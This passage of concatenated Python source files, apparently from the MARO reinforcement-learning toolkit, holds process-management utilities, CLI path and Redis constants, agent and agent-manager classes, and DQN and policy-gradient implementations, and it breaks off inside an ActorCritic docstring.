        ["redis-server", "--port", str(port), "--daemonize yes"]
    )
    # With --daemonize the launching process exits quickly; wait briefly for it.
    launcher.wait(timeout=2)
def close_by_pid(pid: Union[int, list], recursive: bool = False):
    """Kill the process(es) identified by ``pid`` with SIGKILL.

    Args:
        pid (Union[int, list]): A single pid or a list of pids. Pids that no longer
            exist are skipped silently.
        recursive (bool): If True, also kill each process's direct children.
            Generalization: the original ignored ``recursive`` for list input; it is now
            honored per pid (behavior for ``recursive=False`` lists is unchanged).
    """
    if isinstance(pid, int):
        if not psutil.pid_exists(pid):
            return

        if recursive:
            current_process = psutil.Process(pid)
            children_process = current_process.children(recursive=False)
            # May launch by JobTrackingAgent which is child process, so need close parent process first.
            current_process.kill()
            for child_process in children_process:
                child_process.kill()
        else:
            os.kill(pid, signal.SIGKILL)
    else:
        # Apply the same single-pid semantics to each entry of the list.
        for single_pid in pid:
            close_by_pid(single_pid, recursive=recursive)
def get_child_pid(parent_pid):
    """Return the direct child pid(s) of ``parent_pid`` as reported by ``ps``.

    Returns an int when ``ps`` output parses as a single number, otherwise a list of ints.
    """
    ps_command = f"ps -o pid --ppid {parent_pid} --noheaders"
    ps_process = subprocess.Popen(ps_command, shell=True, stdout=subprocess.PIPE)
    raw_output = ps_process.stdout.read()
    ps_process.wait(timeout=2)

    # Convert into list or int
    try:
        return int(raw_output)
    except ValueError:
        # Multiple children: one pid per line, with a trailing empty line after split.
        lines = raw_output.decode().split("\n")
        return [int(line) for line in lines[:-1]]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import logging
import os
class GlobalParams:
    """Default constants shared across maro CLI commands."""
    PARALLELS = 5  # NOTE(review): usage not visible here; presumably default CLI parallelism — confirm.
    LOG_LEVEL = logging.INFO  # Default level for CLI loggers.
    DEFAULT_REDIS_PORT = 6379  # Redis' standard port.
    DEFAULT_FLUENTD_PORT = 24224  # Fluentd's standard forward port.
    DEFAULT_SSH_PORT = 22  # Standard SSH port.
class GlobalPaths:
    """Well-known maro filesystem locations.

    The plain constants are ``~``-relative strings; the ``ABS_``-prefixed variants are
    the same paths expanded to absolute form at import time.
    """
    MARO_LIB = "~/.maro/lib"
    MARO_GRASS_LIB = "~/.maro/lib/grass"
    MARO_K8S_LIB = "~/.maro/lib/k8s"
    MARO_CLUSTERS = "~/.maro/clusters"
    MARO_DATA = "~/.maro/data"
    MARO_TEST = "~/.maro/test"
    MARO_LOCAL_TMP = "~/.maro-local/tmp"
    ABS_MARO_LIB = os.path.expanduser(MARO_LIB)
    ABS_MARO_GRASS_LIB = os.path.expanduser(MARO_GRASS_LIB)
    ABS_MARO_K8S_LIB = os.path.expanduser(MARO_K8S_LIB)
    ABS_MARO_CLUSTERS = os.path.expanduser(MARO_CLUSTERS)
    ABS_MARO_DATA = os.path.expanduser(MARO_DATA)
    ABS_MARO_TEST = os.path.expanduser(MARO_TEST)
    ABS_MARO_LOCAL_TMP = os.path.expanduser(MARO_LOCAL_TMP)
class LocalPaths:
    """Paths used only by the maro process CLI mode."""
    MARO_PROCESS = "~/.maro/process"  # Root folder for process-mode job logs and settings.
    MARO_PROCESS_SETTING = "~/.maro/process/setting.yml"  # Saved setting yaml (see save_setting_info).
    # The following two are absolute paths resolved relative to this module's location.
    MARO_PROCESS_AGENT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "../process/agent/job_agent.py")
    MARO_PROCESS_DEPLOYMENT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "../process/deployment")
class ProcessRedisName:
    """Redis key names used exclusively by maro process mode.

    The two ``*_TICKETS`` keys are Redis lists (lpush/lrange); JOB_DETAILS, RUNNING_JOB
    and SETTING are Redis hashes (hset/hget).
    """
    PENDING_JOB_TICKETS = "process:pending_job_tickets"
    KILLED_JOB_TICKETS = "process:killed_job_tickets"
    JOB_DETAILS = "process:job_details"
    RUNNING_JOB = "process:running_job"
    SETTING = "process:setting"
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.rl.actor import AbsActor, SimpleActor
from maro.rl.agent import AbsAgent, AbsAgentManager, AgentManagerMode, SimpleAgentManager
from maro.rl.algorithms import (
DQN, AbsAlgorithm, ActionInfo, ActorCritic, ActorCriticConfig, DQNConfig, PolicyGradient, PolicyOptimization,
PolicyOptimizationConfig
)
from maro.rl.dist_topologies import (
ActorProxy, ActorWorker, concat_experiences_by_agent, merge_experiences_with_trajectory_boundaries
)
from maro.rl.exploration import (
AbsExplorer, EpsilonGreedyExplorer, GaussianNoiseExplorer, NoiseExplorer, UniformNoiseExplorer
)
from maro.rl.learner import AbsLearner, SimpleLearner
from maro.rl.models import AbsBlock, FullyConnectedBlock, LearningModel, NNStack, OptimizerOptions
from maro.rl.scheduling import LinearParameterScheduler, Scheduler, TwoPhaseLinearParameterScheduler
from maro.rl.shaping import AbsShaper, ActionShaper, ExperienceShaper, KStepExperienceShaper, StateShaper
from maro.rl.storage import AbsStore, ColumnBasedStore, OverwriteType
__all__ = [
"AbsActor", "SimpleActor",
"AbsAgent", "AbsAgentManager", "AgentManagerMode", "SimpleAgentManager",
"AbsAlgorithm", "ActionInfo", "ActorCritic", "ActorCriticConfig", "DQN", "DQNConfig", "PolicyGradient",
"PolicyOptimization", "PolicyOptimizationConfig",
"ActorProxy", "ActorWorker", "concat_experiences_by_agent", "merge_experiences_with_trajectory_boundaries",
"AbsExplorer", "EpsilonGreedyExplorer", "GaussianNoiseExplorer", "NoiseExplorer", "UniformNoiseExplorer",
"AbsLearner", "SimpleLearner",
"AbsBlock", "FullyConnectedBlock", "LearningModel", "NNStack", "OptimizerOptions",
"LinearParameterScheduler", "Scheduler", "TwoPhaseLinearParameterScheduler",
"AbsShaper", "ActionShaper", "ExperienceShaper", "KStepExperienceShaper", "StateShaper",
"AbsStore", "ColumnBasedStore", "OverwriteType"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_actor import AbsActor
from .simple_actor import SimpleActor
__all__ = ["AbsActor", "SimpleActor"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.rl.agent.simple_agent_manager import SimpleAgentManager
from maro.simulator import Env
from .abs_actor import AbsActor
class SimpleActor(AbsActor):
    """A simple ``AbsActor`` implementation.

    Args:
        env (Env): An Env instance.
        agent_manager (SimpleAgentManager): An AgentManager instance that manages all agents.
    """
    def __init__(self, env: Env, agent_manager: SimpleAgentManager):
        super().__init__(env, agent_manager)

    def roll_out(
        self, model_dict: dict = None, exploration_params=None, done: bool = False, return_details: bool = True
    ):
        """Run a single roll-out episode and return its performance and details.

        Args:
            model_dict (dict): If not None, load these models into the agents before rolling out.
            exploration_params: Exploration parameters passed to the agents, if not None.
            done (bool): If True, this is the final call (used to signal remote actor workers
                to exit) and nothing is executed.
            return_details (bool): If True, also return the experiences produced by the episode.

        Returns:
            A (metrics, details) pair; ``(None, None)`` when ``done`` is True.
        """
        # Final call: no episode to run, just signal termination.
        if done:
            return None, None

        self._env.reset()

        # Optionally refresh agent models and exploration parameters for this episode.
        if model_dict is not None:
            self._agents.load_models(model_dict)
        if exploration_params is not None:
            self._agents.set_exploration_params(exploration_params)

        metrics, decision_event, is_done = self._env.step(None)
        while not is_done:
            chosen_action = self._agents.choose_action(decision_event, self._env.snapshot_list)
            metrics, decision_event, is_done = self._env.step(chosen_action)
            self._agents.on_env_feedback(metrics)

        episode_details = self._agents.post_process(self._env.snapshot_list) if return_details else None
        return self._env.metrics, episode_details
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_agent import AbsAgent
from .abs_agent_manager import AbsAgentManager, AgentManagerMode
from .simple_agent_manager import SimpleAgentManager
__all__ = ["AbsAgent", "AbsAgentManager", "AgentManagerMode", "SimpleAgentManager"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from abc import ABC, abstractmethod
from maro.rl.algorithms.abs_algorithm import AbsAlgorithm
from maro.rl.storage.abs_store import AbsStore
class AbsAgent(ABC):
    """Abstract RL agent class.

    A scenario-agnostic sandbox around an RL algorithm: observations and decision events
    are converted to a uniform format before reaching the agent, and its output is
    converted back to an environment-executable form by the surrounding machinery. The
    agent's key responsibility is optimizing its policy through environment interaction.

    Args:
        name (str): Agent's name.
        algorithm (AbsAlgorithm): Concrete algorithm instance that chooses actions and
            optimizes models — the centerpiece of the agent.
        experience_pool (AbsStore): Storage for shaped experiences, used by value-based
            algorithms such as DQN. Defaults to None.
    """
    def __init__(
        self,
        name: str,
        algorithm: AbsAlgorithm,
        experience_pool: AbsStore = None
    ):
        self._name = name
        self._algorithm = algorithm
        self._experience_pool = experience_pool

    @property
    def algorithm(self):
        """Underlying algorithm employed by the agent."""
        return self._algorithm

    @property
    def experience_pool(self):
        """Underlying experience pool where the agent stores experiences."""
        return self._experience_pool

    def choose_action(self, model_state):
        """Delegate action selection to the underlying algorithm.

        Args:
            model_state: State vector as accepted by the underlying algorithm.

        Returns:
            The (possibly exploratory) action produced by the algorithm for ``model_state``.
        """
        return self._algorithm.choose_action(model_state)

    def set_exploration_params(self, **params):
        """Forward exploration parameters to the underlying algorithm."""
        self._algorithm.set_exploration_params(**params)

    @abstractmethod
    def train(self, *args, **kwargs):
        """Training logic to be implemented by the user.

        Typically draws samples from the experience pool and trains the algorithm on them.
        """
        return NotImplementedError

    def store_experiences(self, experiences):
        """Store new experiences in the experience pool, if one is attached."""
        if self._experience_pool is None:
            return
        self._experience_pool.put(experiences)

    def load_model(self, model):
        """Load models from memory."""
        self._algorithm.model.load(model)

    def dump_model(self):
        """Return the algorithm's trainable models."""
        return self._algorithm.model.dump()

    def load_model_from_file(self, dir_path: str):
        """Load trainable models from a directory; the file is named after the agent.

        Args:
            dir_path (str): Directory where the models are saved.
        """
        model_path = os.path.join(dir_path, self._name)
        self._algorithm.model.load_from_file(model_path)

    def dump_model_to_file(self, dir_path: str):
        """Dump trainable models to a directory; the file is named after the agent.

        Args:
            dir_path (str): Directory where the models are saved.
        """
        model_path = os.path.join(dir_path, self._name)
        self._algorithm.model.dump_to_file(model_path)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC, abstractmethod
from enum import Enum
from maro.rl.shaping.action_shaper import ActionShaper
from maro.rl.shaping.experience_shaper import ExperienceShaper
from maro.rl.shaping.state_shaper import StateShaper
from maro.utils.exception.rl_toolkit_exception import AgentManagerModeError
class AgentManagerMode(Enum):
    """Role of an agent manager in the current process: training, inference, or both."""
    TRAIN = "train"
    INFERENCE = "inference"
    TRAIN_INFERENCE = "train_inference"
class AbsAgentManager(ABC):
    """Abstract agent manager class.

    Presents a group of homogeneous/heterogeneous agents to the actor as if they were a
    single agent, hiding their dependencies behind one interactive interface.

    Args:
        name (str): Name of agent manager.
        mode (AgentManagerMode): Role of the agent manager in the current process.
        agent_dict (dict): Agents wrapped by this manager, keyed by agent id.
        state_shaper (StateShaper, optional): Converts environment observations to model input.
        action_shaper (ActionShaper, optional): Converts an agent's model output to an
            environment-executable action. Cannot be None under inference-capable modes.
        experience_shaper (ExperienceShaper, optional): Processes the replay buffer at the
            end of an episode.
    """
    def __init__(
        self,
        name: str,
        mode: AgentManagerMode,
        agent_dict: dict,
        state_shaper: StateShaper = None,
        action_shaper: ActionShaper = None,
        experience_shaper: ExperienceShaper = None
    ):
        self._name = name
        self._mode = mode
        self.agent_dict = agent_dict
        self._state_shaper = state_shaper
        self._action_shaper = action_shaper
        self._experience_shaper = experience_shaper

    def __getitem__(self, agent_id):
        """Index directly into the managed agents by id."""
        return self.agent_dict[agent_id]

    @property
    def name(self):
        """Agent manager's name."""
        return self._name

    @abstractmethod
    def choose_action(self, *args, **kwargs):
        """Generate an environment-executable action from the current decision event and snapshots."""
        return NotImplemented

    @abstractmethod
    def on_env_feedback(self, *args, **kwargs):
        """Handle feedback received from the environment (see ``SimpleAgentManager``)."""
        return NotImplemented

    @abstractmethod
    def post_process(self, *args, **kwargs):
        """End-of-episode processing, e.g. generating experiences and resetting stateful objects."""
        return NotImplemented

    @abstractmethod
    def train(self, experience_by_agent: dict):
        """Train the agents."""
        return NotImplemented

    def set_exploration_params(self, params):
        """Dispatch exploration parameters to the agents.

        A dict keyed entirely by known agent ids is treated as per-agent parameters;
        anything else is broadcast identically to every agent.
        """
        if isinstance(params, dict) and params.keys() <= self.agent_dict.keys():
            for agent_id, agent_params in params.items():
                self.agent_dict[agent_id].set_exploration_params(**agent_params)
        else:
            for agent in self.agent_dict.values():
                agent.set_exploration_params(**params)

    def _assert_train_mode(self):
        # Guard for training-only entry points.
        if self._mode not in {AgentManagerMode.TRAIN, AgentManagerMode.TRAIN_INFERENCE}:
            raise AgentManagerModeError(msg=f"this method is unavailable under mode {self._mode}")

    def _assert_inference_mode(self):
        # Guard for inference-only entry points.
        if self._mode not in {AgentManagerMode.INFERENCE, AgentManagerMode.TRAIN_INFERENCE}:
            raise AgentManagerModeError(msg=f"this method is unavailable under mode {self._mode}")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from abc import abstractmethod
from maro.rl.algorithms.policy_optimization import ActionInfo
from maro.rl.shaping.action_shaper import ActionShaper
from maro.rl.shaping.experience_shaper import ExperienceShaper
from maro.rl.shaping.state_shaper import StateShaper
from maro.rl.storage.column_based_store import ColumnBasedStore
from maro.utils.exception.rl_toolkit_exception import MissingShaper
from .abs_agent_manager import AbsAgentManager, AgentManagerMode
class SimpleAgentManager(AbsAgentManager):
    """Default ``AbsAgentManager`` that records a trajectory and shapes it into experiences.

    Under INFERENCE / TRAIN_INFERENCE modes all three shapers are required.
    """
    def __init__(
        self,
        name: str,
        mode: AgentManagerMode,
        agent_dict: dict,
        state_shaper: StateShaper = None,
        action_shaper: ActionShaper = None,
        experience_shaper: ExperienceShaper = None
    ):
        if mode in {AgentManagerMode.INFERENCE, AgentManagerMode.TRAIN_INFERENCE}:
            # Bug fix: these messages used ``self._mode`` before super().__init__() had set it,
            # so the intended MissingShaper surfaced as an AttributeError instead.
            if state_shaper is None:
                raise MissingShaper(msg=f"state shaper cannot be None under mode {mode}")
            if action_shaper is None:
                raise MissingShaper(msg=f"action_shaper cannot be None under mode {mode}")
            if experience_shaper is None:
                raise MissingShaper(msg=f"experience_shaper cannot be None under mode {mode}")

        super().__init__(
            name, mode, agent_dict,
            state_shaper=state_shaper,
            action_shaper=action_shaper,
            experience_shaper=experience_shaper
        )

        # Data structures to temporarily store transitions and trajectory
        self._transition_cache = {}
        self._trajectory = ColumnBasedStore()

    def choose_action(self, decision_event, snapshot_list):
        """Shape the decision event into a model state, query the owning agent, shape its action."""
        self._assert_inference_mode()
        agent_id, model_state = self._state_shaper(decision_event, snapshot_list)
        action_info = self.agent_dict[agent_id].choose_action(model_state)

        # Cache the transition; "metrics" is filled in later by on_env_feedback().
        self._transition_cache = {
            "state": model_state,
            "reward": None,
            "agent_id": agent_id,
            "event": decision_event
        }
        # Policy-optimization algorithms return an ActionInfo carrying a log-probability.
        if isinstance(action_info, ActionInfo):
            self._transition_cache["action"] = action_info.action
            self._transition_cache["log_action_probability"] = action_info.log_probability
        else:
            self._transition_cache["action"] = action_info

        return self._action_shaper(self._transition_cache["action"], decision_event, snapshot_list)

    def on_env_feedback(self, metrics):
        """This method records the environment-generated metrics as part of the latest transition in the trajectory.

        Args:
            metrics: business metrics provided by the environment after an action has been executed.
        """
        self._transition_cache["metrics"] = metrics
        self._trajectory.put(self._transition_cache)

    def post_process(self, snapshot_list):
        """This method processes the latest trajectory into experiences.

        Args:
            snapshot_list: the snapshot list from the env at the end of an episode.
        """
        experiences = self._experience_shaper(self._trajectory, snapshot_list)
        # Reset per-episode state so the next episode starts clean.
        self._trajectory.clear()
        self._transition_cache = {}
        self._state_shaper.reset()
        self._action_shaper.reset()
        self._experience_shaper.reset()
        return experiences

    @abstractmethod
    def train(self, experiences_by_agent: dict):
        """Train all agents."""
        return NotImplementedError

    def load_models(self, agent_model_dict):
        """Load models from memory for each agent."""
        for agent_id, models in agent_model_dict.items():
            self.agent_dict[agent_id].load_model(models)

    def dump_models(self) -> dict:
        """Get agents' underlying models.

        This is usually used in distributed mode where models need to be broadcast to remote roll-out actors.
        """
        return {agent_id: agent.dump_model() for agent_id, agent in self.agent_dict.items()}

    def load_models_from_files(self, dir_path):
        """Load models from disk for each agent."""
        for agent in self.agent_dict.values():
            agent.load_model_from_file(dir_path)

    def dump_models_to_files(self, dir_path: str):
        """Dump agents' models to disk.

        Each agent will use its own name to create a separate file under ``dir_path`` for dumping.
        """
        os.makedirs(dir_path, exist_ok=True)
        for agent in self.agent_dict.values():
            agent.dump_model_to_file(dir_path)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_algorithm import AbsAlgorithm
from .dqn import DQN, DQNConfig
from .policy_optimization import (
ActionInfo, ActorCritic, ActorCriticConfig, PolicyGradient, PolicyOptimization, PolicyOptimizationConfig
)
__all__ = [
"AbsAlgorithm",
"DQN", "DQNConfig",
"ActionInfo", "ActorCritic", "ActorCriticConfig", "PolicyGradient", "PolicyOptimization",
"PolicyOptimizationConfig"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC, abstractmethod
import torch
from maro.rl.models.learning_model import LearningModel
from maro.utils.exception.rl_toolkit_exception import UnrecognizedTask
class AbsAlgorithm(ABC):
    """Abstract RL algorithm class.

    Provides the uniform policy interface (``choose_action`` / ``train``) shared by the
    predefined algorithms (DQN, A2C, etc.); inherit from it to implement custom algorithms.

    Args:
        model (LearningModel): Task model or container of task models required by the algorithm.
        config: Settings for the algorithm.
    """
    def __init__(self, model: LearningModel, config):
        # Place the model on GPU when available, otherwise fall back to CPU.
        self._device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self._model = model.to(self._device)
        self._config = config

    @property
    def model(self):
        """The model (container) driven by this algorithm."""
        return self._model

    @abstractmethod
    def choose_action(self, state):
        """Compute an action from a shaped state using the underlying model(s).

        Args:
            state: A state object shaped by a ``StateShaper`` to conform to the model
                input format.

        Returns:
            The action for ``state``; usually converted to an environment-executable
            action by an ``ActionShaper`` afterwards.
        """
        return NotImplementedError

    @abstractmethod
    def train(self, *args, **kwargs):
        """Train models using samples.

        Algorithm-specific; e.g. DQN's version looks like
        train(self, state_batch, action_batch, reward_batch, next_state_batch).
        """
        return NotImplementedError

    def set_exploration_params(self, **params):
        # No-op by default; exploration-aware algorithms override this.
        pass

    @staticmethod
    def validate_task_names(model_task_names, expected_task_names):
        """Raise ``UnrecognizedTask`` when a multi-task model's task names differ from the expected set."""
        actual_names = set(model_task_names)
        expected_names = set(expected_task_names)
        if len(model_task_names) > 1 and actual_names != expected_names:
            raise UnrecognizedTask(f"Expected task names {expected_names}, got {actual_names}")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Union
import numpy as np
import torch
from maro.rl.models.learning_model import LearningModel
from .abs_algorithm import AbsAlgorithm
class DQNConfig:
    """Configuration for the DQN algorithm.

    Args:
        reward_discount (float): Reward decay as defined in standard RL terminology.
        loss_cls: Loss function class for evaluating TD errors; instantiated with a
            ``reduction`` keyword ("none" when per-sample TD errors are requested, else "mean").
        target_update_frequency (int): Number of training rounds between target model updates.
        epsilon (float): Exploration rate for epsilon-greedy exploration. Defaults to 0.0
            (no exploration).
        tau (float): Soft update coefficient, i.e., target_model = tau * eval_model + (1 - tau) * target_model.
            Defaults to 0.1.
        is_double (bool): If True, the next Q values are computed per the double DQN algorithm,
            i.e., q_next = Q_target(s, argmax(Q_eval(s, a))); otherwise q_next = max(Q_target(s, a)).
            See https://arxiv.org/pdf/1509.06461.pdf for details. Defaults to True.
        advantage_mode (str): Advantage mode for the dueling architecture. Defaults to None,
            meaning a regular (non-dueling) Q-value model is assumed.
        per_sample_td_error_enabled (bool): If True, per-sample TD errors will be returned
            by the DQN's train() method. Defaults to False.
    """
    __slots__ = [
        "reward_discount", "loss_func", "target_update_frequency", "epsilon", "tau", "is_double", "advantage_mode",
        "per_sample_td_error_enabled"
    ]

    def __init__(
        self,
        reward_discount: float,
        loss_cls,
        target_update_frequency: int,
        epsilon: float = .0,
        tau: float = 0.1,
        is_double: bool = True,
        advantage_mode: str = None,
        per_sample_td_error_enabled: bool = False
    ):
        self.reward_discount = reward_discount
        self.target_update_frequency = target_update_frequency
        self.epsilon = epsilon
        self.tau = tau
        self.is_double = is_double
        self.advantage_mode = advantage_mode
        self.per_sample_td_error_enabled = per_sample_td_error_enabled
        # Per-sample TD errors require element-wise losses; otherwise reduce to the mean.
        reduction = "none" if per_sample_td_error_enabled else "mean"
        self.loss_func = loss_cls(reduction=reduction)
class DQN(AbsAlgorithm):
    """The Deep-Q-Networks algorithm.

    See https://web.stanford.edu/class/psych209/Readings/MnihEtAlHassibis15NatureControlDeepRL.pdf for details.

    Args:
        model (LearningModel): Q-value model. Either a plain single-task Q-value model, or a dueling
            model exposing "state_value" and "advantage" task heads.
        config: Configuration for DQN algorithm.
    """
    def __init__(self, model: LearningModel, config: DQNConfig):
        # Head names are only validated for multi-task (dueling) models.
        self.validate_task_names(model.task_names, {"state_value", "advantage"})
        super().__init__(model, config)
        # output_dim is an int for a single-task model, or a dict keyed by task name for a dueling model.
        if isinstance(self._model.output_dim, int):
            self._num_actions = self._model.output_dim
        else:
            self._num_actions = self._model.output_dim["advantage"]
        self._training_counter = 0
        # Frozen copy used as the bootstrapping target; an untrainable model needs none.
        self._target_model = model.copy() if model.is_trainable else None

    def choose_action(self, state: np.ndarray) -> Union[int, np.ndarray]:
        """Epsilon-greedy action selection for a single state (1D) or a batch of states (2D).

        Args:
            state: A single state (1D array) or a batch of states (2D array).

        Returns:
            A scalar action for a single state, or an array of actions for a batch.
        """
        state = torch.from_numpy(state).to(self._device)
        is_single = len(state.shape) == 1
        if is_single:
            state = state.unsqueeze(dim=0)
        greedy_action = self._get_q_values(self._model, state, is_training=False).argmax(dim=1).data
        # No exploration
        if self._config.epsilon == .0:
            return greedy_action.item() if is_single else greedy_action.numpy()
        if is_single:
            return greedy_action if np.random.random() > self._config.epsilon else np.random.choice(self._num_actions)
        # batch inference
        return np.array([
            act if np.random.random() > self._config.epsilon else np.random.choice(self._num_actions)
            for act in greedy_action
        ])

    def _get_q_values(self, model, states, is_training: bool = True):
        """Q-values from ``model``; combines the dueling heads when advantage_mode is set."""
        if self._config.advantage_mode is not None:
            output = model(states, is_training=is_training)
            state_values = output["state_value"]
            advantages = output["advantage"]
            # Use mean or max correction to address the identifiability issue
            corrections = advantages.mean(1) if self._config.advantage_mode == "mean" else advantages.max(1)[0]
            return state_values + advantages - corrections.unsqueeze(1)
        else:
            return model(states, is_training=is_training)

    def _get_next_q_values(self, current_q_values_for_all_actions, next_states):
        """Bootstrapped Q-values for the next states, from the target model.

        Args:
            current_q_values_for_all_actions: Retained for backward compatibility; no longer used.
            next_states: Batch of next states.
        """
        next_q_values_for_all_actions = self._get_q_values(self._target_model, next_states, is_training=False)
        if self._config.is_double:
            # BUG FIX: double DQN selects the bootstrap action via argmax of the *evaluation* net
            # on the *next* states, i.e., q_next = Q_target(s', argmax_a Q_eval(s', a)).
            # The previous implementation took the argmax over the current states' Q-values.
            eval_next_q_values = self._get_q_values(self._model, next_states, is_training=False)
            actions = eval_next_q_values.max(dim=1)[1].unsqueeze(1)
            return next_q_values_for_all_actions.gather(1, actions).squeeze(1)  # (N,)
        else:
            return next_q_values_for_all_actions.max(dim=1)[0]  # (N,)

    def _compute_td_errors(self, states, actions, rewards, next_states):
        """TD errors for a batch of transitions (per-sample or reduced, per config.loss_func)."""
        if len(actions.shape) == 1:
            actions = actions.unsqueeze(1)  # (N, 1)
        current_q_values_for_all_actions = self._get_q_values(self._model, states)
        current_q_values = current_q_values_for_all_actions.gather(1, actions).squeeze(1)  # (N,)
        next_q_values = self._get_next_q_values(current_q_values_for_all_actions, next_states)  # (N,)
        # detach(): the TD target must not propagate gradients back into the models.
        target_q_values = (rewards + self._config.reward_discount * next_q_values).detach()  # (N,)
        return self._config.loss_func(current_q_values, target_q_values)

    def train(self, states: np.ndarray, actions: np.ndarray, rewards: np.ndarray, next_states: np.ndarray):
        """One gradient step on a batch of transitions.

        Returns:
            The TD errors as a numpy array (per-sample if per_sample_td_error_enabled, else reduced).
        """
        states = torch.from_numpy(states).to(self._device)
        actions = torch.from_numpy(actions).to(self._device)
        rewards = torch.from_numpy(rewards).to(self._device)
        next_states = torch.from_numpy(next_states).to(self._device)
        loss = self._compute_td_errors(states, actions, rewards, next_states)
        self._model.learn(loss.mean() if self._config.per_sample_td_error_enabled else loss)
        self._training_counter += 1
        # Periodically pull the target net towards the eval net (soft update with coefficient tau).
        if self._training_counter % self._config.target_update_frequency == 0:
            self._target_model.soft_update(self._model, self._config.tau)
        return loss.detach().numpy()

    def set_exploration_params(self, epsilon):
        """Set the epsilon-greedy exploration rate."""
        self._config.epsilon = epsilon
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import namedtuple
from typing import Callable, List, Union
import numpy as np
import torch
from maro.rl.algorithms.abs_algorithm import AbsAlgorithm
from maro.rl.models.learning_model import LearningModel
from maro.rl.utils.trajectory_utils import get_lambda_returns, get_truncated_cumulative_reward
ActionInfo = namedtuple("ActionInfo", ["action", "log_probability"])
class PolicyOptimizationConfig:
    """Base configuration shared by the policy optimization algorithm family."""
    __slots__ = ["reward_discount"]

    def __init__(self, reward_discount):
        # Discount factor applied to future rewards (gamma in standard RL terminology).
        self.reward_discount = reward_discount
class PolicyOptimization(AbsAlgorithm):
    """Policy optimization algorithm family.

    The algorithm family includes policy gradient (e.g. REINFORCE), actor-critic, PPO, etc.
    """
    def choose_action(self, state: np.ndarray) -> Union[ActionInfo, List[ActionInfo]]:
        """Use the actor (policy) model to generate stochastic actions.

        Args:
            state: Input to the actor model. Either a single state (1D array) or a batch
                of states (2D array).

        Returns:
            A single ActionInfo namedtuple or a list of ActionInfo namedtuples.
        """
        state = torch.from_numpy(state).to(self._device)
        is_single = len(state.shape) == 1
        if is_single:
            state = state.unsqueeze(dim=0)
        # BUG FIX: do not call .squeeze() on the model output here. For a batch of size 1
        # it would also collapse the batch dimension, making the batch loop below iterate
        # over scalars. Index row 0 explicitly in the single-state case instead.
        action_distribution = self._model(state, task_name="actor", is_training=False).numpy()
        if is_single:
            distribution = action_distribution[0]
            action = np.random.choice(len(distribution), p=distribution)
            return ActionInfo(action=action, log_probability=np.log(distribution[action]))
        # batch inference
        batch_results = []
        for distribution in action_distribution:
            action = np.random.choice(len(distribution), p=distribution)
            batch_results.append(ActionInfo(action=action, log_probability=np.log(distribution[action])))
        return batch_results

    def train(
        self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray
    ):
        """Algorithm-specific training logic; must be implemented by subclasses."""
        raise NotImplementedError
class PolicyGradient(PolicyOptimization):
    """The vanilla Policy Gradient (VPG) algorithm, a.k.a., REINFORCE.

    Reference: https://github.com/openai/spinningup/tree/master/spinup/algos/pytorch.
    """
    def train(
        self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray
    ):
        """Run one REINFORCE update over a full trajectory.

        Discounted returns are computed from the raw rewards and used to weight the
        log-probabilities of the actions actually taken under the current policy.
        """
        # Discounted cumulative returns, computed on the numpy side first.
        cumulative_returns = get_truncated_cumulative_reward(rewards, self._config.reward_discount)
        state_batch = torch.from_numpy(states).to(self._device)
        action_batch = torch.from_numpy(actions).to(self._device)
        return_batch = torch.from_numpy(cumulative_returns).to(self._device)
        # Probability of each taken action under the current policy.
        distribution_batch = self._model(state_batch)
        taken_action_prob = distribution_batch.gather(1, action_batch.unsqueeze(1)).squeeze()  # (N,)
        policy_loss = -(torch.log(taken_action_prob) * return_batch).mean()
        self._model.learn(policy_loss)
class ActorCriticConfig(PolicyOptimizationConfig):
    """Configuration for the Actor-Critic algorithm.

    Args:
        reward_discount (float): Reward decay as defined in standard RL terminology.
        critic_loss_func (Callable): Loss function for the critic model.
        train_iters (int): Number of gradient descent steps per call to ``train``.
        actor_loss_coefficient (float): Weight of the actor loss in the combined loss,
            loss = critic_loss + actor_loss_coefficient * actor_loss. Defaults to 1.0.
        k (int): Number of time steps used in computing returns or return estimates. Defaults to -1,
            in which case rewards are accumulated until the end of the trajectory.
        lam (float): Lambda coefficient used in computing lambda returns. Defaults to 1.0, in which
            case the usual k-step return is computed.
        clip_ratio (float): Clip ratio as used in the PPO algorithm (https://arxiv.org/pdf/1707.06347.pdf).
            Defaults to None, in which case the actor loss is the usual policy gradient objective.
    """
    __slots__ = [
        "reward_discount", "critic_loss_func", "train_iters", "actor_loss_coefficient", "k", "lam", "clip_ratio"
    ]

    def __init__(
        self,
        reward_discount: float,
        critic_loss_func: Callable,
        train_iters: int,
        actor_loss_coefficient: float = 1.0,
        k: int = -1,
        lam: float = 1.0,
        clip_ratio: float = None
    ):
        super().__init__(reward_discount)
        self.train_iters = train_iters
        self.critic_loss_func = critic_loss_func
        self.k = k
        self.lam = lam
        self.clip_ratio = clip_ratio
        self.actor_loss_coefficient = actor_loss_coefficient
class ActorCritic(PolicyOptimization):
    """Actor Critic algorithm with separate policy and value models.

    References:
    https://github.com/openai/spinningup/tree/master/spinup/algos/pytorch.
    https://towardsdatascience.com/understanding-actor-critic-methods-931b97b6df3f

    Args:
        model (LearningModel): Multi-task model that computes action distributions and state values.
            It may or may not have a shared bottom stack.
